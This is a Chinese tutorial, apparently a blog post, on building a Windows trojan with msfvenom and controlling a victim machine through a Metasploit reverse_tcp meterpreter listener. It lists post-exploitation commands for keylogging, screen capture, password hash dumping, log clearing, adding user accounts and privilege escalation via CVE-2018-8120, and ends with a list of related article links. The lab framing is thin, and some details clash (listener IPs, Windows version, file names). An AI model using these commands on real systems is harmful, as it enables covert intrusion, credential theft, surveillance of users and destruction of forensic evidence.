原理:

利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中。

准备:

目标:win7 x64专业版
攻击主机:Kali IP:192.168.1.143

生成:

生成test.exe木马文件
Step1:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=12345 -f exe > /root/test.exe

使用:

Step1:输入msfconsole进入metasploit

Step2:进入监听模块
Use exploit/multi/handler

Step3:设置payload反弹
Set payload windows/meterpreter/reverse_tcp

Step4:设置LHOST、LPORT参数
set LHOST 192.168.1.143(要监听的本地IP)
set LPORT 12345(要监听本地端口)

Step5:exploit攻击开始

Step6:把生成的木马文件hacker.exe拷贝到靶机WinXP系统中
在测试机中运行该exe文件,回到kali

出现该界面,表示渗透成功,可以对测试机进行一波操作了。

meterpreter下的命令:
getwd 当前目录
dir 查看所有文件
cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
download c:\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息

键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop

屏幕截图
screenshot

屏幕监控
run vnc

获取密文密码
hashdump

shell
获取shell,进入cmd

cmd下(测试机是windows):

dir:显示所有文件
cd:切换目录
whoami 查看当前用户级别
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码

演示一下上传漏洞实现本地提权
CVE-2018-8120.exe (漏洞目录在kali的/root/CVE-2018-8120.exe)

出现了乱码现象,这是编码的问题,在编辑->首选项->兼容性->修改编码—>改成中文的GB2312退出再次shell

CVE-2018-8120.exe ‘whoami’ 运行,有些机子可以,有些不可以。

MSF生成一个木马与使用相关推荐

  1. MSF生成windows木马

    msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom ...

  2. msf 生成.wsf 木马

    ** 网络安全重磅福利:入门&进阶全套282G学习资源包免费分享! ** 首先了解wsf是啥语言,可参考文章如下: https://www.cnblogs.com/vitrox/p/51374 ...

  3. vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器

    一.背景介绍 Metasploit就是一个漏洞框架.它的全称叫做The Metasploit Framework,简称叫做MSF.Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强 ...

  4. MSF(2)——各种木马的生成及简单的免杀

    本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录 前文链接 木马生成 免杀 php 免杀 Python 免杀 分析木马文件 编写免杀马 打包exe 前文链接 WAMP/DVWA/sql ...

  5. MSF生成木马及木马的简单使用

    0x00 前言 本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正. 由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVE ...

  6. MSF生成木马渗透WIN7

    文章目录 1.生成木马 2.启动msfconsole 3.后门操作 3.1 文件(文件,目录等)操作 3.2 网络命令(net等)操作 3.3 系统命令(权限,用户,用户组等)操作 3.4 压缩工具( ...

  7. msf安卓手机木马实战要点整理

    Msf手机木马高级选项设置说明 Androidwakelock  阻止手机休眠以便处理耗时操作 AutoUnhookProcess  ? AutoVerifySession        自动验证删除 ...

  8. 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

    MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...

  9. 教你制作一个木马免杀的360

    制作一个360免杀的木马 我们用到工具: kail:利用msfvenom (美少妇) MSFvenom 的常用命令 1.我们进入到msf里面 在msf后生成一个exe的木马文件,这-p 就是生成win ...

最新文章

  1. 深度学习处在大爆炸时代的边缘
  2. eclipse 设定source folder
  3. 将二维序列变为一维度序列进行预测的设计
  4. 026_使用eclipse生成hashCode和equals方法
  5. 基础知识:什么是ASP.NET Razor页面?
  6. 排序算法:冒泡和快排 摘自网络
  7. 注解的力量 -----Spring 2.5 JPA hibernate 使用方法的点滴整理(六): 一些常用的数据库 注解...
  8. [vue] 使用vue开发过程你是怎么做接口管理的?
  9. 桩筏有限元中的弹性板计算_采用PKPM系列JCCAD软件桩筏筏板有限元方法计算的模型参数 -...
  10. IE浏览器报错 ‘Rowspan’ 为空或不是对象
  11. mysql中创建视图语法错误_mysql - 使用过程MySQL创建视图时出错 - 堆栈内存溢出
  12. 再谈“炼金术”:可以使用不严谨的方法,但拒绝不严谨的评估方法
  13. NVIDIA TK1 刷机记录(1)ubuntu 14.04
  14. 初次接触面元法对螺旋桨的性能预报,发现之前很多学者都是用fortran进行编程进行性能预报,为什么不用matlab呢,两者的差异在哪里,建议初学者用这哪个软件呢
  15. R数据分析:竞争风险模型的做法和解释
  16. Arduino与Proteus仿真实例-74HC573锁存器驱动仿真
  17. blog6-beta_2
  18. 本大三狗处博——为工作消得人憔悴
  19. 温度记录仪和传感器的校准知识
  20. CSS3新特性——新增选择器,2D/3D转换,动画

热门文章

  1. C-获得文件大小并动态申请内存屏幕打印文件内容小程序
  2. 神目云抗疫又出杀手锏:风险人物轨迹追溯,毫秒锁定密切接触者
  3. 数据资产价值评估常用方法及对比
  4. 无法打开kernel32.lib
  5. 面向对象编程练习(一)
  6. exit status 145: The directory is not empty,exit status 5: �ܾ����ʡ� ,nvm切换node版本问题汇总
  7. 职业经理人管理素养提升课程
  8. marktext安装配置-设置中文语言包
  9. Github标星超级牛,免费又好用的Redis客户端工具!
  10. vue根据数字显示对应的文字状态